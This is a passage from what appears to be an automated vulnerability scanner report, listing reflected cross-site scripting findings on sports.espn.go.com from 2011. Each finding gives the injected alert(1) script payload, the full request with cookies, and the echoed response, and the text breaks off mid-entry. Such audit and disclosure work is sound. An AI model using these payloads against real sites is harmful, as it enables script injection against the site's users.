3.342. http://sports.espn.go.com/chicago/nfl/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/nfl/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload df167--><script>alert(1)</script>1c3289f1740 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /chicago/nfl/columns/story?columnist=isaacson_melissadf167--><script>alert(1)</script>1c3289f1740&id=6137245 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:22:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:22:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 26 Feb 2011 02:23:33 GMT
Content-Length: 41569
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Dave Duerson's form
...[SNIP]...
<!--url:/chicago/nfl/columns/story?columnist=isaacson_melissadf167--><script>alert(1)</script>1c3289f1740&id=6137245-->
...[SNIP]...

3.343. http://sports.espn.go.com/chicago/teams/recap [sport parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/teams/recap

Issue detail

The value of the sport request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0f9"><script>alert(1)</script>e1494246220 was submitted in the sport parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chicago/teams/recap?gameId=310542507&sport=ncbbf0f9"><script>alert(1)</script>e1494246220 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:22:52 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:22:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 26 Feb 2011 02:23:52 GMT
Content-Length: 21817
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Game Recap - ESPN C
...[SNIP]...
<a href="http://sports.espn.go.com/ncbbf0f9"><script>alert(1)</script>e1494246220/boxscore?gameId=310542507">
...[SNIP]...

3.344. http://sports.espn.go.com/espn/js/uniloginInLineReplace [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /espn/js/uniloginInLineReplace

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload d4bef<script>alert(1)</script>37fa09da2a3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /espn/js/uniloginInLineReplace?cb=runOmnitureIndependentlyd4bef<script>alert(1)</script>37fa09da2a3 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:08:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:08:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Wed, 23 Feb 2011 23:18:02 GMT
Content-Length: 324
Connection: close
X-UA-Compatible: IE=EmulateIE7


if(""==""){
   runOmnitureIndependentlyd4bef<script>alert(1)</script>37fa09da2a3(null, null, null, null, null, null, null);
}
else{
   var insiderTokenCheck = "0";
   if(insiderTokenCheck == "0") insiderTokenCheck = "0";
   runOmnitureIndependentlyd4bef<script>
...[SNIP]...

3.345. http://sports.espn.go.com/golf/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /golf/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 79c9f--><script>alert(1)</script>32e5dd3314b was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /golf/columns/story?columnist=sobel_jason79c9f--><script>alert(1)</script>32e5dd3314b&page=CiL HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Wed, 23 Feb 2011 23:07:54 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN05
Cache-Expires: Wed, 23 Feb 2011 23:10:09 GMT
Content-Length: 41287
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/golf/columns/story?columnist=sobel_jason79c9f--><script>alert(1)</script>32e5dd3314b&page=CiL-->
...[SNIP]...

3.346. http://sports.espn.go.com/mlb/columns/story [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /mlb/columns/story

Issue detail

The value of the id request parameter is copied into an HTML comment. The payload a24de--><script>alert(1)</script>8a656193ce9 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mlb/columns/story?columnist=crasnick_jerry&id=6095672\a24de--><script>alert(1)</script>8a656193ce9 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Sat, 26 Feb 2011 02:21:47 GMT
Content-Type: text/html
Last-Modified: Sat, 26 Feb 2011 02:21:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 26 Feb 2011 02:22:47 GMT
Content-Length: 59814
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/mlb/columns/story?columnist=crasnick_jerry&id=6095672\a24de--><script>alert(1)</script>8a656193ce9-->
...[SNIP]...

3.347. http://sports.espn.go.com/ncaa/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /ncaa/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload f2e24--><script>alert(1)</script>7793b931b30 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ncaa/columns/story?columnist=forde_patf2e24--><script>alert(1)</script>7793b931b30&id=6150934 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:40 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Wed, 23 Feb 2011 23:14:00 GMT
Content-Length: 50181
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/ncaa/columns/story?columnist=forde_patf2e24--><script>alert(1)</script>7793b931b30&id=6150934-->
...[SNIP]...

3.348. http://sports.espn.go.com/ncaa/columns/story [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /ncaa/columns/story

Issue detail

The value of the id request parameter is copied into an HTML comment. The payload e22e0--><script>alert(1)</script>51559d0ec4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ncaa/columns/story?columnist=forde_pat&id=6150934e22e0--><script>alert(1)</script>51559d0ec4 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:42 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Wed, 23 Feb 2011 23:14:02 GMT
Content-Length: 48840
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!--/ncaa/columns/story?columnist=forde_pat&id=6150934e22e0--><script>alert(1)</script>51559d0ec4-->
...[SNIP]...

3.349. http://sports.espn.go.com/new-york/mlb/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/mlb/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload ab783--><script>alert(1)</script>13cf7f13f38 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/mlb/columns/story?columnist=marchand_andrewab783--><script>alert(1)</script>13cf7f13f38&id=6148017 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN35
Cache-Expires: Wed, 23 Feb 2011 23:08:25 GMT
Content-Length: 48771
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Spring Training 201
...[SNIP]...
<!--url:/newyork/mlb/columns/story?columnist=marchand_andrewab783--><script>alert(1)</script>13cf7f13f38&id=6148017-->
...[SNIP]...

3.350. http://sports.espn.go.com/new-york/nba/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/nba/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload a78ab--><script>alert(1)</script>30f7ceccaa0 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/nba/columns/story?columnist=smith_stephena78ab--><script>alert(1)</script>30f7ceccaa0&id=6151461 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Wed, 23 Feb 2011 23:08:02 GMT
Content-Length: 49403
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The New Jersey Nets
...[SNIP]...
<!--url:/newyork/nba/columns/story?columnist=smith_stephena78ab--><script>alert(1)</script>30f7ceccaa0&id=6151461-->
...[SNIP]...

3.351. http://sports.espn.go.com/new-york/ncb/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/ncb/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 96982--><script>alert(1)</script>2e8bd08d9cb was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/ncb/columns/story?columnist=darcy_kieran96982--><script>alert(1)</script>2e8bd08d9cb&id=6149055 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Wed, 23 Feb 2011 23:08:07 GMT
Content-Length: 45822
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>St. John's is back
...[SNIP]...
<!--url:/newyork/ncb/columns/story?columnist=darcy_kieran96982--><script>alert(1)</script>2e8bd08d9cb&id=6149055-->
...[SNIP]...

3.352. http://sports.espn.go.com/new-york/nfl/columns/story [columnist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /new-york/nfl/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload 7fb3d--><script>alert(1)</script>49cb1de33c was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new-york/nfl/columns/story?columnist=cimini_rich7fb3d--><script>alert(1)</script>49cb1de33c&id=6124996 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:07:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:07:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Wed, 23 Feb 2011 23:08:29 GMT
Content-Length: 41612
Connection: close
